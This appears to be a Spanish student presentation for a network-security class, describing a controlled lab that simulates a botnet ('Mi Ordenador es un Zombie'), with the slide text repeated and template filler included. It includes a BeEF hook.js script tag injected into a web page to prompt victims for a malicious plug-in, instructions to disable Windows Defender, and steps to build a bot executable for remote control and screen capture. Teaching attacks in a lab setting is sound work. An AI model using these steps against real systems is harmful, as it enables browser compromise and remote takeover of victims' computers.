Mi Ordenador es un Zombie
Seguridad en RedesAdolfo Morena Anguita
Objetivo
El objetivo de esta práctica es simular, en un entorno controlado de clase, la infección de varios equipos para que puedan ser controlados desde un único equipo atacante mediante un servidor de bots. Una vez comprometido el equipo víctima, se comprueba el control remoto verificando que aparece el plug-in malicioso y que el atacante es capaz de capturar la pantalla del equipo infectado.
Entorno de la práctica
La práctica se realiza en un entorno controlado con tres máquinas en la misma red.
- La máquina atacante (Windows 7) aloja el servidor web, el servidor de bots y la base de datos de los equipos infectados.
- La máquina propagadora (Kali Linux) se utiliza para mostrar a la víctima un plug-in malicioso mediante la herramienta BeEF.
- La máquina víctima (Windows 7 INCIBE), ejecutada en una máquina virtual, accede a la página web desde el navegador Firefox y recibe la infección sin afectar al equipo real.
Primer paso: instalación y configuración de WAMP
En la máquina atacante se instala WAMP, que actúa como servidor web local.Tras la instalación, debemos modificar el archivo de configuración de Apache (httpd.conf) para permitir el acceso desde otros equipos de la red, cambiando la directiva de acceso local por acceso general, buscamos “onlineoffline” y justo debajo cambiamos “Require local” por “Require all granted”. A continuación, se copian los ficheros necesarios de la práctica (todo el contenido de las carpetas "www" y "Servidor web") al directorio público del servidor (C:\wamp\www) y se reinician los servicios de Apache y MySQL para aplicar los cambios.
Por último debemos importar la base de datos "localhost.sql" en phpMyAdmindel Wamp.
- Comprobamos que el servidor de Wamp esté activado.
- En Wamp entramos en phpMyAdmin o escribimos "http://localhost/phpmyadmin/" en nuestro buscador.
- Pulsamos en "Importar" y "Seleccionar archivo" y buscamos el archivo de la base de datos.
Modificación de "pagina.php"
Abrimos el archivo con un editor de texto y cambiamos en esta línea la IP por la IP de la máquina propagadora, en este caso Kali.'<script src="http://192.168.1.105:3000/hook.js" type="text/javascript"><\/script>' Así cuando la víctima tenga nuestra página cargada su navegador solicita el script alojado en Kali, lo que provoca la aparición de un mensaje para instalar un plug-in.
Generación del virus
Antes de generar el ejecutable debemos desactivar la configuración del antivirus ya que Windows Defender puede eliminar los ficheros necesarios durante el proceso.Nos descargamos la carpeta "Ejecutables compilados", copiamos el ejecutable "flu-nucleo.exe" (asegurandonos de que su tamaño sea de 30 KB) en la carpeta "c:/wamp/www". Posteriormente ejecuntamos "generadorBots" que está en la misma carpeta. En la primera caja de texto ponemos la Ip de la máquina atacante, pulsamos en "Crear" y guardamos "flu.exe" en la carpeta "c:/wamp/www"
Escribe un título aquí
Disciplinas como el Visual Thinking facilitan la toma de notas visualmente ricas gracias al uso de imágenes, gráficas, infografías y dibujos sencillos. ¡Dale caña!
El contenido visual es un lenguaje transversal, universal, como la música. Somos capaces de entender imágenes de hace millones de años, incluso de otras culturas.
¿Sabías que Genially te permite compartir tu creación directamente, sin necesidad de descargas? Listo para que tu público pueda visualizarlo en cualquier dispositivo y difundir en cualquier lugar.
Utiliza este espacio para poner una frase genial
02:30
Seguridad en Redes
¡Muchas gracias!
Adolfo Morena Anguita adomorang@gmail.com
Archivo de configuración
Ficheros necesarios
IP Máquina atacante
IP Máquina propagadora
IP Máquina víctima
Archivo de configuración
Ficheros necesarios
Mi Ordenador es un Zombie
Adolfo Morena Anguita
Created on February 5, 2026
Start designing with a free template
Discover more than 1500 professional designs like these:
View
Terrazzo Presentation
View
Visual Presentation
View
Relaxing Presentation
View
Modern Presentation
View
Colorful Presentation
View
Modular Structure Presentation
View
Chromatic Presentation
Explore all templates
Transcript
Mi Ordenador es un Zombie
Seguridad en RedesAdolfo Morena Anguita
Objetivo
El objetivo de esta práctica es simular, en un entorno controlado de clase, la infección de varios equipos para que puedan ser controlados desde un único equipo atacante mediante un servidor de bots. Una vez comprometido el equipo víctima, se comprueba el control remoto verificando que aparece el plug-in malicioso y que el atacante es capaz de capturar la pantalla del equipo infectado.
Entorno de la práctica
La práctica se realiza en un entorno controlado con tres máquinas en la misma red.
Primer paso: instalación y configuración de WAMP
En la máquina atacante se instala WAMP, que actúa como servidor web local.Tras la instalación, debemos modificar el archivo de configuración de Apache (httpd.conf) para permitir el acceso desde otros equipos de la red, cambiando la directiva de acceso local por acceso general, buscamos “onlineoffline” y justo debajo cambiamos “Require local” por “Require all granted”. A continuación, se copian los ficheros necesarios de la práctica (todo el contenido de las carpetas "www" y "Servidor web") al directorio público del servidor (C:\wamp\www) y se reinician los servicios de Apache y MySQL para aplicar los cambios.
Por último debemos importar la base de datos "localhost.sql" en phpMyAdmindel Wamp.
Modificación de "pagina.php"
Abrimos el archivo con un editor de texto y cambiamos en esta línea la IP por la IP de la máquina propagadora, en este caso Kali.'<script src="http://192.168.1.105:3000/hook.js" type="text/javascript"><\/script>' Así cuando la víctima tenga nuestra página cargada su navegador solicita el script alojado en Kali, lo que provoca la aparición de un mensaje para instalar un plug-in.
Generación del virus
Antes de generar el ejecutable debemos desactivar la configuración del antivirus ya que Windows Defender puede eliminar los ficheros necesarios durante el proceso.Nos descargamos la carpeta "Ejecutables compilados", copiamos el ejecutable "flu-nucleo.exe" (asegurandonos de que su tamaño sea de 30 KB) en la carpeta "c:/wamp/www". Posteriormente ejecuntamos "generadorBots" que está en la misma carpeta. En la primera caja de texto ponemos la Ip de la máquina atacante, pulsamos en "Crear" y guardamos "flu.exe" en la carpeta "c:/wamp/www"
Escribe un título aquí
Disciplinas como el Visual Thinking facilitan la toma de notas visualmente ricas gracias al uso de imágenes, gráficas, infografías y dibujos sencillos. ¡Dale caña!
El contenido visual es un lenguaje transversal, universal, como la música. Somos capaces de entender imágenes de hace millones de años, incluso de otras culturas.
¿Sabías que Genially te permite compartir tu creación directamente, sin necesidad de descargas? Listo para que tu público pueda visualizarlo en cualquier dispositivo y difundir en cualquier lugar.
Utiliza este espacio para poner una frase genial
02:30
Seguridad en Redes
¡Muchas gracias!
Adolfo Morena Anguita adomorang@gmail.com
Archivo de configuración
Ficheros necesarios
IP Máquina atacante
IP Máquina propagadora
IP Máquina víctima
Archivo de configuración
Ficheros necesarios